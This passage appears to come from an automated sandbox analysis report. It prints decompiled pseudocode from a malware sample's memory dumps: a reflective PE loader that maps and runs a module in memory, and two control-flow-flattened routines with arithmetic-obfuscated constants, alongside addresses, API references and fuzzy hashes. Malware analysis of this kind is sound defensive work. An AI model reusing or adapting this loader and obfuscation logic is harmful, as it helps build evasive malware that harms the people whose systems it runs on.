				void* _t86;
				void* _t89;
				void* _t90;
				void* _t95;
				intOrPtr _t98;
				intOrPtr* _t100;
				void* _t109;
				intOrPtr _t111;
				void* _t112;
				intOrPtr _t113;
				void* _t114;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr* _t128;
				intOrPtr* _t129;
				signed int _t131;
				intOrPtr _t133;
				signed int _t135;
				long _t138;
				long _t139;
				void* _t147;
				void* _t148;
				void* _t149;
				void* _t150;

				_t113 = _a8;
				_t147 = 0;
				_v8 = __ecx;
				if(_t113 >= 0x40) {
					_t129 = _a4;
					if( *_t129 == 0x5a4d) {
						_t117 =  *((intOrPtr*)(_t129 + 0x3c));
						if(_t113 < _t117 + 0xf8) {
							goto L1;
						} else {
							_t114 = _t117 + _t129;
							if( *((intOrPtr*)(_t117 + _t129)) != 0x4550 ||  *((intOrPtr*)(_t114 + 4)) != 0x14c || ( *(_t114 + 0x38) & 0x00000001) != 0) {
								goto L3;
							} else {
								_t12 = _t114 + 0x14; // 0xc033cd33
								_t67 =  *_t12 & 0x0000ffff;
								_t13 = _t114 + 6; // 0xe8ef4d8d
								_t135 =  *_t13 & 0x0000ffff;
								if(_t135 != 0) {
									_t14 = _t114 + 0x24; // 0x100013ef
									_t128 = _t14 + _t67;
									do {
										_t15 = _t128 + 4; // 0x12f7805
										_t133 =  *_t15;
										_t111 =  *_t128;
										if(_t133 != 0) {
											_t112 = _t111 + _t133;
										} else {
											_t16 = _t114 + 0x38; // 0xff1075ff
											_t112 = _t111 +  *_t16;
										}
										_t147 =  >  ? _t112 : _t147;
										_t128 = _t128 + 0x28;
										_t135 = _t135 - 1;
									} while (_t135 != 0);
								}
								_push( &_v48); // executed
								L100037FA(); // executed
								_t118 = _v44;
								_t19 = _t118 - 1; // -1
								_t20 = _t114 + 0x50; // 0xcc25d
								_t21 = _t118 - 1; // -1
								_t22 = _t118 - 1; // -1
								_t131 =  !_t21;
								_t138 = _t19 +  *_t20 & _t131;
								if(_t138 == (_t22 + _t147 & _t131)) {
									_t23 = _t114 + 0x34; // 0xec8b55cc, executed
									_t72 = VirtualAlloc( *_t23, _t138, 0x3000, 4); // executed
									_t148 = _t72;
									_v12 = _t148;
									if(_t148 != 0) {
										L18:
										_t74 = HeapAlloc(GetProcessHeap(), 8, 0x34);
										_t139 = _t74;
										if(_t139 != 0) {
											 *(_t139 + 4) = _t148;
											_t27 = _t114 + 0x16; // 0xe85ec033
											 *(_t139 + 0x14) = ( *_t27 & 0x0000ffff) >> 0x0000000d & 0x00000001;
											 *((intOrPtr*)(_t139 + 0x1c)) = _a12;
											 *((intOrPtr*)(_t139 + 0x20)) = _a16;
											 *((intOrPtr*)(_t139 + 0x24)) = _a20;
											 *((intOrPtr*)(_t139 + 0x28)) = _a24;
											 *((intOrPtr*)(_t139 + 0x30)) = _v44;
											_t40 = _t114 + 0x54; // 0xec8b55cc
											if(E100015F0(_a8,  *_t40) == 0) {
												L36:
												_t115 = _v8;
												goto L37;
											} else {
												_t42 = _t114 + 0x54; // 0xec8b55cc
												_t86 = VirtualAlloc(_t148,  *_t42, 0x1000, 4);
												_t43 = _t114 + 0x54; // 0xec8b55cc
												_t149 = _t86;
												E10001F40(_t149, _a4,  *_t43);
												_t89 =  *((intOrPtr*)(_a4 + 0x3c)) + _t149;
												_t150 = _v12;
												 *_t139 = _t89;
												 *((intOrPtr*)(_t89 + 0x34)) = _t150;
												_t90 = E10001620(_a4, _a8, _t114, _t139); // executed
												if(_t90 == 0) {
													goto L36;
												} else {
													_t52 = _t114 + 0x34; // 0xec8b55cc
													_t93 =  *((intOrPtr*)( *_t139 + 0x34)) ==  *_t52;
													_t115 = _v8;
													if( *((intOrPtr*)( *_t139 + 0x34)) ==  *_t52) {
														 *((intOrPtr*)(_t139 + 0x18)) = 1;
													} else {
														 *((intOrPtr*)(_t139 + 0x18)) = E10001E90(_t139, _t93);
													}
													if(E10001470(_t115, _t139) == 0) {
														L37:
														E10001980(_t139);
														return 0;
													} else {
														_t95 = E10001830(_t115, _t139); // executed
														if(_t95 == 0 || E10001730(_t139) == 0) {
															goto L37;
														} else {
															_t98 =  *((intOrPtr*)( *_t139 + 0x28));
															if(_t98 == 0) {
																 *((intOrPtr*)(_t139 + 0x2c)) = 0;
																return _t139;
															} else {
																_t100 = _t98 + _t150;
																if( *(_t139 + 0x14) == 0) {
																	 *((intOrPtr*)(_t139 + 0x2c)) = _t100;
																	return _t139;
																} else {
																	_push(0);
																	_push(1);
																	_push(0x10000000);
																	if( *_t100() != 0) {
																		 *((intOrPtr*)(_t139 + 0x10)) = 1;
																		return _t139;
																	} else {
																		SetLastError(0x45a);
																		E10001980(_t139);
																		return 0;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											VirtualFree(_t148, _t74, 0x8000);
											goto L20;
										}
									} else {
										_t109 = VirtualAlloc(_t72, _t138, 0x3000, 4); // executed
										_t148 = _t109;
										_v12 = _t109;
										if(_t148 == 0) {
											L20:
											SetLastError(0xe);
											return 0;
										} else {
											goto L18;
										}
									}
								} else {
									SetLastError(0xc1);
									return 0;
								}
							}
						}
					} else {
						L3:
						SetLastError(0xc1);
						return 0;
					}
				} else {
					L1:
					SetLastError(0xd);
					return 0;
				}
			}

0x10001b37
0x10001b3b
0x10001b3d
0x10001b43
0x10001b57
0x10001b62
0x10001b79
0x10001b84
0x00000000
0x10001b86
0x10001b8d
0x10001b90
0x00000000
0x10001ba3
0x10001ba3
0x10001ba3
0x10001ba8
0x10001ba8
0x10001bae
0x10001bb0
0x10001bb3
0x10001bb5
0x10001bb5
0x10001bb5
0x10001bb8
0x10001bbc
0x10001bc3
0x10001bbe
0x10001bbe
0x10001bbe
0x10001bbe
0x10001bc7
0x10001bca
0x10001bcd
0x10001bcd
0x10001bb5
0x10001bd3
0x10001bd4
0x10001bd9
0x10001bdc
0x10001bdf
0x10001be2
0x10001be5
0x10001be8
0x10001bec
0x10001bf2
0x10001c12
0x10001c15
0x10001c1b
0x10001c1d
0x10001c22
0x10001c3c
0x10001c47
0x10001c4d
0x10001c51
0x10001c73
0x10001c76
0x10001c83
0x10001c89
0x10001c8f
0x10001c95
0x10001c9b
0x10001ca1
0x10001ca4
0x10001cb1
0x10001db9
0x10001db9
0x00000000
0x10001cb7
0x10001cbe
0x10001cc2
0x10001cc8
0x10001ccb
0x10001cd1
0x10001ce2
0x10001ce4
0x10001cec
0x10001cef
0x10001cf2
0x10001cf9
0x00000000
0x10001cff
0x10001d04
0x10001d04
0x10001d07
0x10001d0a
0x10001d1a
0x10001d0c
0x10001d15
0x10001d15
0x10001d2b
0x10001dbc
0x10001dbf
0x10001dcc
0x10001d31
0x10001d34
0x10001d3b
0x00000000
0x10001d49
0x10001d4b
0x10001d50
0x10001da7
0x10001db6
0x10001d52
0x10001d52
0x10001d58
0x10001d99
0x10001da4
0x10001d5a
0x10001d5a
0x10001d5c
0x10001d5e
0x10001d67
0x10001d87
0x10001d96
0x10001d69
0x10001d6e
0x10001d77
0x10001d84
0x10001d84
0x10001d67
0x10001d58
0x10001d50
0x10001d3b
0x10001d2b
0x10001cf9
0x10001c53
0x10001c5a
0x00000000
0x10001c5a
0x10001c24
0x10001c2d
0x10001c33
0x10001c35
0x10001c3a
0x10001c60
0x10001c62
0x10001c70
0x00000000
0x00000000
0x00000000
0x10001c3a
0x10001bf4
0x10001bf9
0x10001c07
0x10001c07
0x10001bf2
0x10001b90
0x10001b64
0x10001b64
0x10001b69
0x10001b76
0x10001b76
0x10001b45
0x10001b45
0x10001b47
0x10001b54
0x10001b54

APIs

SetLastError.KERNEL32(0000000D,00000000,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000,?,100013CB,00000000,00000000), ref: 10001B47
SetLastError.KERNEL32(000000C1,00000000,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000,?,100013CB,00000000,00000000), ref: 10001B69

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 0e9596fd0e00a28270cdeae167b1d017198df9441bd56490207fb2c6c147fb2d
Instruction ID: dde5234afa376a0e77413f1c03799da7f4dedddb12eec0223d0ea39616f97933
Opcode Fuzzy Hash: 0e9596fd0e00a28270cdeae167b1d017198df9441bd56490207fb2c6c147fb2d
Instruction Fuzzy Hash: EC81D036700215ABEB00DF69DC80BE9B7E8FB88391F10416AFD04DB246E731E955CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00254B41, Relevance: 15.2, Strings: 12, Instructions: 226
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00254B41() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _t200;
				signed int _t202;
				signed int _t206;
				void* _t210;
				signed int _t211;
				signed int _t212;
				void* _t214;
				signed int _t216;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				void* _t245;
				signed int* _t247;
				void* _t249;

				_t247 =  &_v592;
				_v592 = 0xe399;
				_v592 = _v592 << 2;
				_t214 = 0xf501058;
				_v592 = _v592 << 0xe;
				_v592 = _v592 ^ 0xe399001c;
				_v588 = 0x8f0f;
				_v588 = _v588 * 0x29;
				_t245 = 0;
				_v588 = _v588 ^ 0x0016e94e;
				_v568 = 0x725;
				_t239 = 0x36;
				_v568 = _v568 / _t239;
				_t240 = 0xc;
				_v568 = _v568 * 0x63;
				_v568 = _v568 << 8;
				_v568 = _v568 ^ 0x000ca091;
				_v532 = 0x951;
				_v532 = _v532 << 7;
				_v532 = _v532 ^ 0x0004989a;
				_v524 = 0x2ad;
				_v524 = _v524 | 0xf8213247;
				_v524 = _v524 ^ 0xf82150c2;
				_v548 = 0x8830;
				_v548 = _v548 >> 0xd;
				_v548 = _v548 >> 0xf;
				_v548 = _v548 ^ 0x00006238;
				_v588 = 0xba20;
				_v588 = _v588 | 0x721cc32f;
				_v588 = _v588 ^ 0x721c8c06;
				_v580 = 0x8092;
				_v580 = _v580 + 0xfffffe56;
				_v580 = _v580 / _t240;
				_v580 = _v580 >> 3;
				_v580 = _v580 ^ 0x000005b6;
				_v540 = 0xe99f;
				_v540 = _v540 + 0xfffff8d3;
				_v540 = _v540 | 0x984d7063;
				_v540 = _v540 ^ 0x984d8ec7;
				_v556 = 0xc4eb;
				_t241 = 0x4e;
				_v556 = _v556 * 0x5c;
				_v556 = _v556 + 0x75ac;
				_v556 = _v556 ^ 0x00477921;
				_v536 = 0x9b3b;
				_v536 = _v536 + 0xaa1d;
				_v536 = _v536 ^ 0x00012776;
				_v572 = 0x8e84;
				_v572 = _v572 * 0x29;
				_v572 = _v572 / _t241;
				_v572 = _v572 >> 0xa;
				_v572 = _v572 ^ 0x000020e9;
				_v528 = 0xcb2d;
				_t242 = 0x21;
				_v528 = _v528 / _t242;
				_v528 = _v528 ^ 0x00001b4e;
				_v544 = 0x6df7;
				_v544 = _v544 ^ 0x414c8853;
				_t243 = 0x49;
				_v544 = _v544 * 0x75;
				_v544 = _v544 ^ 0xd824a1d7;
				_v552 = 0xc4f0;
				_v552 = _v552 ^ 0x9d070a5f;
				_v552 = _v552 + 0xffff498d;
				_v552 = _v552 ^ 0x9d0763b6;
				_v564 = 0xe384;
				_v564 = _v564 ^ 0xde12aa62;
				_v564 = _v564 | 0x2c019ae9;
				_v564 = _v564 ^ 0xa4e5f9a5;
				_v564 = _v564 ^ 0x5af67a61;
				_v576 = 0x7d9f;
				_v576 = _v576 + 0x6134;
				_v576 = _v576 | 0x6ccc595a;
				_v576 = _v576 ^ 0x0058e7ee;
				_v576 = _v576 ^ 0x6c9448a2;
				_v592 = 0x396f;
				_v592 = _v592 * 7;
				_v592 = _v592 ^ 0x10cc7cbf;
				_v592 = _v592 ^ 0x10cdfb96;
				_v560 = 0x3078;
				_v560 = _v560 << 8;
				_t244 = _v588;
				_v560 = _v560 / _t243;
				_v560 = _v560 + 0xffff6a19;
				_v560 = _v560 ^ 0x000f142e;
				goto L1;
				do {
					while(1) {
						L1:
						_t249 = _t214 - 0x3227b83a;
						if(_t249 > 0) {
							break;
						}
						if(_t249 == 0) {
							_v584 = 0xc457;
							_v584 = _v584 >> 6;
							_t165 =  &_v584;
							 *_t165 = _v584 ^ 0x0000030d;
							__eflags =  *_t165;
							_t202 =  *0x25ca2c; // 0x6d8300
							 *((intOrPtr*)(_t202 + 0x218)) = E00257CC2;
							L13:
							_t214 = 0x2ded9275;
							continue;
						}
						if(_t214 == 0xf501058) {
							_push(_t214);
							_push(_t214);
							_t206 = E00248736(0x454);
							 *0x25ca2c = _t206;
							__eflags = _t206;
							if(_t206 == 0) {
								goto L23;
							}
							 *((intOrPtr*)(_t206 + 0x214)) = E002520C5;
							_t214 = 0x382146c2;
							continue;
						}
						if(_t214 == 0x204dd1d9) {
							E0024B112();
							_t214 = 0x354eaa90;
							continue;
						}
						if(_t214 == 0x24baa30b) {
							_v584 = 0xe62c;
							_t214 = 0x36e33d60;
							_v584 = _v584 ^ 0x84d80cbd;
							_v584 = _v584 ^ 0x84d8eab8;
							continue;
						}
						if(_t214 != 0x2ded9275) {
							goto L22;
						}
						_push(_t214);
						_push(_t214);
						E0024C6C7(_v536, _v572,  *0x25ca2c, _t214, _v528, _v584, _v544); // executed
						_t247 =  &(_t247[7]);
						_t214 = 0x204dd1d9;
						_t210 = 1;
						_t245 =  ==  ? _t210 : _t245;
					}
					__eflags = _t214 - 0x354eaa90;
					if(__eflags == 0) {
						E00253E3F(_t214,  &_v520, __eflags, _v552, _v564);
						_t200 = E0024E29C(_v576, _v592,  &_v520);
						_t216 =  *0x25ca2c; // 0x6d8300
						_t247 =  &(_t247[3]);
						 *((intOrPtr*)(_t216 + 0x438)) = _t200;
						_t214 = 0xae4e76a;
						goto L22;
					}
					__eflags = _t214 - 0x36e33d60;
					if(_t214 == 0x36e33d60) {
						E00245FB2(_v540, _v556, _t244);
						goto L13;
					}
					__eflags = _t214 - 0x382146c2;
					if(_t214 != 0x382146c2) {
						goto L22;
					}
					_t211 = E00242959(_t214, _v548, _v588, _v580, _v560); // executed
					_t244 = _t211;
					_t247 =  &(_t247[4]);
					__eflags = _t244;
					if(_t244 == 0) {
						_t214 = 0x3227b83a;
					} else {
						_t212 =  *0x25ca2c; // 0x6d8300
						 *((intOrPtr*)(_t212 + 0x224)) = 1;
						_t214 = 0x24baa30b;
					}
					goto L1;
					L22:
					__eflags = _t214 - 0xae4e76a;
				} while (_t214 != 0xae4e76a);
				L23:
				return _t245;
			}

0x00254b41
0x00254b47
0x00254b50
0x00254b54
0x00254b59
0x00254b5d
0x00254b64
0x00254b75
0x00254b79
0x00254b7b
0x00254b83
0x00254b91
0x00254b96
0x00254ba1
0x00254ba4
0x00254ba8
0x00254bad
0x00254bb5
0x00254bbd
0x00254bc2
0x00254bca
0x00254bd2
0x00254bda
0x00254be2
0x00254bea
0x00254bef
0x00254bf4
0x00254bfc
0x00254c04
0x00254c0c
0x00254c14
0x00254c1c
0x00254c2c
0x00254c30
0x00254c35
0x00254c3d
0x00254c45
0x00254c4d
0x00254c55
0x00254c5d
0x00254c6a
0x00254c6d
0x00254c71
0x00254c79
0x00254c81
0x00254c89
0x00254c91
0x00254c99
0x00254ca6
0x00254cb2
0x00254cb6
0x00254cbb
0x00254cc3
0x00254ccf
0x00254cd2
0x00254cd6
0x00254cde
0x00254ce6
0x00254cf7
0x00254d02
0x00254d06
0x00254d0e
0x00254d16
0x00254d1e
0x00254d26
0x00254d2e
0x00254d36
0x00254d3e
0x00254d46
0x00254d4e
0x00254d56
0x00254d5e
0x00254d66
0x00254d6e
0x00254d76
0x00254d7e
0x00254d8b
0x00254d8f
0x00254d97
0x00254d9f
0x00254da7
0x00254db2
0x00254db6
0x00254dba
0x00254dc2
0x00254dc2
0x00254dca
0x00254dca
0x00254dca
0x00254dca
0x00254dcc
0x00000000
0x00000000
0x00254dd2
0x00254e98
0x00254ea0
0x00254ea5
0x00254ea5
0x00254ea5
0x00254ead
0x00254eb2
0x00254ebc
0x00254ebc
0x00000000
0x00254ebc
0x00254dde
0x00254e69
0x00254e6a
0x00254e70
0x00254e75
0x00254e7c
0x00254e7e
0x00000000
0x00000000
0x00254e84
0x00254e8e
0x00000000
0x00254e8e
0x00254de6
0x00254e4e
0x00254e53
0x00000000
0x00254e53
0x00254dee
0x00254e2c
0x00254e34
0x00254e39
0x00254e41
0x00000000
0x00254e41
0x00254df2
0x00000000
0x00000000
0x00254df8
0x00254df9
0x00254e15
0x00254e1a
0x00254e1d
0x00254e26
0x00254e27
0x00254e27
0x00254ec3
0x00254ec9
0x00254f39
0x00254f4b
0x00254f50
0x00254f56
0x00254f59
0x00254f5f
0x00000000
0x00254f5f
0x00254ecb
0x00254ed1
0x00254f25
0x00000000
0x00254f2a
0x00254ed3
0x00254ed9
0x00000000
0x00000000
0x00254eef
0x00254ef4
0x00254ef6
0x00254ef9
0x00254efb
0x00254f15
0x00254efd
0x00254efd
0x00254f05
0x00254f0b
0x00254f0b
0x00000000
0x00254f64
0x00254f64
0x00254f64
0x00254f71
0x00254f7c

Strings

, xrefs: 00254CBB
Q, xrefs: 00254BB5
,, xrefs: 00254E2C
j, xrefs: 00254F64
`=6, xrefs: 00254E34
o9, xrefs: 00254D7E
x0, xrefs: 00254D9F
X, xrefs: 00254D6E
!yG, xrefs: 00254C79
8b, xrefs: 00254BF4
j, xrefs: 00254F5F
`=6, xrefs: 00254ECB

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: !yG$,$8b$Q$`=6$`=6$j$j$o9$x0$ $X
API String ID: 0-3958274775
Opcode ID: 73acc367e87a424f838ee28749b258c675f1c99f70d9738166c4467e0f9e8165
Instruction ID: 9c3b14688c7355e7ad7e77fd19442113bc79baf6b839d2217bf02e8e668f04f6
Opcode Fuzzy Hash: 73acc367e87a424f838ee28749b258c675f1c99f70d9738166c4467e0f9e8165
Instruction Fuzzy Hash: EBA155711183819FD358DF64C48A42BFBE1FBC4358F204A1DF596962A0D7B8CA99CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 00253895, Relevance: 14.0, Strings: 11, Instructions: 274
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00253895() {
				char _v524;
				signed int _v528;
				signed int _v532;
				intOrPtr _v536;
				signed int _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				unsigned int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _t281;
				intOrPtr _t284;
				void* _t286;
				void* _t290;
				void* _t294;
				void* _t295;
				char _t297;
				void* _t303;
				intOrPtr _t321;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int* _t331;

				_t331 =  &_v700;
				_v532 = _v532 & 0x00000000;
				_v528 = _v528 & 0x00000000;
				_t295 = 0x16120aa4;
				_v536 = 0x65127b;
				_v664 = 0x3b49;
				_v664 = _v664 << 5;
				_v664 = _v664 + 0x6a36;
				_v664 = _v664 >> 7;
				_v664 = _v664 ^ 0x00000fa7;
				_v616 = 0x772f;
				_v616 = _v616 ^ 0x73b15b69;
				_v616 = _v616 ^ 0x73b12d46;
				_v604 = 0xe6c8;
				_v604 = _v604 + 0x8155;
				_v604 = _v604 ^ 0x000105e4;
				_v700 = 0xa5d;
				_v700 = _v700 * 0x52;
				_t294 = 0;
				_v700 = _v700 + 0xffffecf8;
				_t325 = 0x58;
				_v700 = _v700 * 0x66;
				_v700 = _v700 ^ 0x014b32de;
				_v684 = 0xc8e0;
				_v684 = _v684 + 0x308b;
				_v684 = _v684 + 0x2664;
				_v684 = _v684 >> 6;
				_v684 = _v684 ^ 0x00006abe;
				_v676 = 0x796a;
				_v676 = _v676 + 0xffff196c;
				_v676 = _v676 + 0xffffd40e;
				_v676 = _v676 ^ 0xd773f48b;
				_v676 = _v676 ^ 0x288ceae9;
				_v612 = 0x157c;
				_v612 = _v612 << 0x10;
				_v612 = _v612 ^ 0x157c11c9;
				_v652 = 0xe7a2;
				_v652 = _v652 / _t325;
				_v652 = _v652 | 0x448e2e0d;
				_v652 = _v652 ^ 0x448e7eb8;
				_v640 = 0x3ee9;
				_v640 = _v640 * 0x5d;
				_v640 = _v640 >> 0xd;
				_v640 = _v640 ^ 0x0000282d;
				_v648 = 0xf425;
				_v648 = _v648 * 9;
				_v648 = _v648 >> 1;
				_v648 = _v648 ^ 0x0004354a;
				_v608 = 0x24ee;
				_v608 = _v608 + 0x809c;
				_v608 = _v608 ^ 0x0000fdeb;
				_v636 = 0x6dae;
				_v636 = _v636 + 0x1c44;
				_v636 = _v636 + 0x2b83;
				_v636 = _v636 ^ 0x0000a12d;
				_v656 = 0xe590;
				_v656 = _v656 >> 2;
				_v656 = _v656 << 7;
				_v656 = _v656 ^ 0x001cffcc;
				_v668 = 0xb9db;
				_v668 = _v668 >> 0xd;
				_v668 = _v668 + 0x89dd;
				_v668 = _v668 | 0xbce2fd3c;
				_v668 = _v668 ^ 0xbce2f9c6;
				_v596 = 0x1790;
				_v596 = _v596 + 0xffff27ec;
				_v596 = _v596 ^ 0xffff59a3;
				_v672 = 0xffb9;
				_v672 = _v672 + 0xffff618d;
				_v672 = _v672 >> 2;
				_t326 = 0x31;
				_v672 = _v672 * 0x75;
				_v672 = _v672 ^ 0x000b38e4;
				_v644 = 0xc4de;
				_v644 = _v644 + 0xbfb6;
				_v644 = _v644 ^ 0xc1434f22;
				_v644 = _v644 ^ 0xc142a5f5;
				_v680 = 0x8a5a;
				_v680 = _v680 | 0x8f6cf4f7;
				_v680 = _v680 + 0x838e;
				_v680 = _v680 + 0xffffa8f9;
				_v680 = _v680 ^ 0x8f6d4033;
				_v660 = 0xe8e2;
				_v660 = _v660 / _t326;
				_t327 = 0x25;
				_v660 = _v660 * 0x78;
				_v660 = _v660 ^ 0x000205be;
				_v688 = 0x9cd0;
				_v688 = _v688 + 0x8e7d;
				_v688 = _v688 * 0x26;
				_v688 = _v688 * 0x51;
				_v688 = _v688 ^ 0x0e0ecd55;
				_v620 = 0xe1b5;
				_v620 = _v620 / _t327;
				_v620 = _v620 ^ 0x00005557;
				_v696 = 0x769d;
				_v696 = _v696 >> 7;
				_v696 = _v696 | 0x5538ae99;
				_v696 = _v696 << 2;
				_v696 = _v696 ^ 0x54e2b31f;
				_v600 = 0xdcef;
				_v600 = _v600 << 6;
				_v600 = _v600 ^ 0x003705ca;
				_v624 = 0x48eb;
				_v624 = _v624 >> 0xd;
				_v624 = _v624 ^ 0x00002379;
				_v692 = 0xfa2c;
				_v692 = _v692 | 0x4759ecfd;
				_v692 = _v692 >> 0xc;
				_v692 = _v692 >> 9;
				_v692 = _v692 ^ 0x000062c4;
				_v632 = 0xbcd9;
				_v632 = _v632 << 4;
				_v632 = _v632 | 0x68c1d353;
				_v632 = _v632 ^ 0x68cbf855;
				_v628 = 0x848;
				_t328 = 0x1c;
				_v628 = _v628 / _t328;
				_v628 = _v628 ^ 0x00001dd4;
				_t324 = _v628;
				_v592 = 0xa720;
				_v592 = _v592 + 0xffff9569;
				_v592 = _v592 ^ 0x00003c8a;
				do {
					while(_t295 != 0x2b0230e) {
						if(_t295 == 0x16120aa4) {
							_t295 = 0x182cddf3;
							continue;
						} else {
							if(_t295 == 0x182cddf3) {
								E0025AAAE(_v604, _v700, _v684,  &_v588, _v676);
								_t331 =  &(_t331[3]);
								_t295 = 0x2f4d7b3a;
								continue;
							} else {
								if(_t295 == 0x1c4d16fa) {
									_t284 = _v584;
									_t297 = _v588;
									_v548 = _v548 & 0x00000000;
									_v576 = _t284;
									_v568 = _t284;
									_v560 = _t284;
									_v552 = _t284;
									_v580 = _t297;
									_v572 = _t297;
									_v564 = _t297;
									_v556 = _t297;
									_t286 = E0024B6DD(_t297, _v600, _t297, _t324, _v624,  &_v580, _v692); // executed
									_t331 =  &(_t331[5]);
									__eflags = _t286;
									_t294 =  !=  ? 1 : _t294;
									_t295 = 0x2a39a402;
									continue;
								} else {
									if(_t295 == 0x2a39a402) {
										E00254F7D(_v632, _v628, _t324); // executed
									} else {
										if(_t295 == 0x2f4d7b3a) {
											_v588 = _v588 - E0024F46D();
											_t295 = 0x369a1b5f;
											asm("sbb [esp+0x84], edx");
											continue;
										} else {
											_t339 = _t295 - 0x369a1b5f;
											if(_t295 != 0x369a1b5f) {
												goto L16;
											} else {
												_push(_v652);
												_t290 = E0025889D(0x25c9b0, _v612, _t339);
												_pop(_t303);
												_t321 =  *0x25ca2c; // 0x6d8300
												_t224 = _t321 + 0x230; // 0x670056
												E0024C680(_t224, _v648, _v608, _t303, _v636,  *0x25ca2c, _t290,  &_v524);
												_t331 =  &(_t331[7]);
												E00252025(_v656, _t290, _v668, _v596);
												_t295 = 0x2b0230e;
												continue;
											}
										}
									}
								}
							}
						}
						L19:
						return _t294;
					}
					_t281 = E0024B566(_t295, _v664, _v672, _v644, _v616, _v680, _t295, _v660, _v688, 0, _v620, _v696, _v592,  &_v524); // executed
					_t324 = _t281;
					_t331 =  &(_t331[0xc]);
					__eflags = _t281 - 0xffffffff;
					if(__eflags == 0) {
						_t295 = 0x1d984ba2;
						goto L16;
					} else {
						_t295 = 0x1c4d16fa;
						continue;
					}
					goto L19;
					L16:
					__eflags = _t295 - 0x1d984ba2;
				} while (__eflags != 0);
				goto L19;
			}

0x00253895
0x0025389b
0x002538a5
0x002538ad
0x002538b2
0x002538bd
0x002538c5
0x002538ca
0x002538d2
0x002538d7
0x002538df
0x002538e7
0x002538ef
0x002538f7
0x002538ff
0x00253907
0x0025390f
0x0025391e
0x00253922
0x00253924
0x00253933
0x00253934
0x00253938
0x00253940
0x00253948
0x00253950
0x00253958
0x0025395d
0x00253965
0x0025396d
0x00253975
0x0025397d
0x00253985
0x0025398d
0x00253995
0x0025399a
0x002539a2
0x002539b0
0x002539b4
0x002539bc
0x002539c4
0x002539d1
0x002539d5
0x002539da
0x002539e2
0x002539ef
0x002539f3
0x002539f7
0x002539ff
0x00253a07
0x00253a0f
0x00253a17
0x00253a1f
0x00253a27
0x00253a2f
0x00253a37
0x00253a3f
0x00253a44
0x00253a49
0x00253a51
0x00253a59
0x00253a5e
0x00253a66
0x00253a6e
0x00253a76
0x00253a7e
0x00253a86
0x00253a8e
0x00253a96
0x00253a9e
0x00253aac
0x00253ab4
0x00253ab8
0x00253ac0
0x00253ac8
0x00253ad0
0x00253ad8
0x00253ae0
0x00253ae8
0x00253af0
0x00253af8
0x00253b00
0x00253b08
0x00253b18
0x00253b21
0x00253b24
0x00253b28
0x00253b30
0x00253b38
0x00253b45
0x00253b4e
0x00253b52
0x00253b5a
0x00253b6a
0x00253b6e
0x00253b76
0x00253b7e
0x00253b83
0x00253b8b
0x00253b90
0x00253b98
0x00253ba0
0x00253ba5
0x00253bad
0x00253bb5
0x00253bba
0x00253bc2
0x00253bca
0x00253bd2
0x00253bd7
0x00253bdc
0x00253be4
0x00253bec
0x00253bf1
0x00253bf9
0x00253c01
0x00253c0d
0x00253c10
0x00253c14
0x00253c1c
0x00253c20
0x00253c28
0x00253c30
0x00253c38
0x00253c38
0x00253c4a
0x00253db7
0x00000000
0x00253c50
0x00253c52
0x00253da5
0x00253daa
0x00253dad
0x00000000
0x00253c58
0x00253c5e
0x00253d0c
0x00253d17
0x00253d1e
0x00253d26
0x00253d2d
0x00253d34
0x00253d3b
0x00253d57
0x00253d5e
0x00253d65
0x00253d6c
0x00253d73
0x00253d7a
0x00253d7e
0x00253d80
0x00253d83
0x00000000
0x00253c64
0x00253c6a
0x00253e2c
0x00253c70
0x00253c76
0x00253cf4
0x00253cfb
0x00253d00
0x00000000
0x00253c78
0x00253c78
0x00253c7e
0x00000000
0x00253c84
0x00253c84
0x00253c91
0x00253c96
0x00253cb8
0x00253cc2
0x00253cc8
0x00253ccd
0x00253cde
0x00253ce5
0x00000000
0x00253ce5
0x00253c7e
0x00253c76
0x00253c6a
0x00253c5e
0x00253c52
0x00253e35
0x00253e3e
0x00253e3e
0x00253df7
0x00253dfc
0x00253dfe
0x00253e01
0x00253e04
0x00253e10
0x00000000
0x00253e06
0x00253e06
0x00000000
0x00253e06
0x00000000
0x00253e15
0x00253e15
0x00253e15
0x00000000

Strings

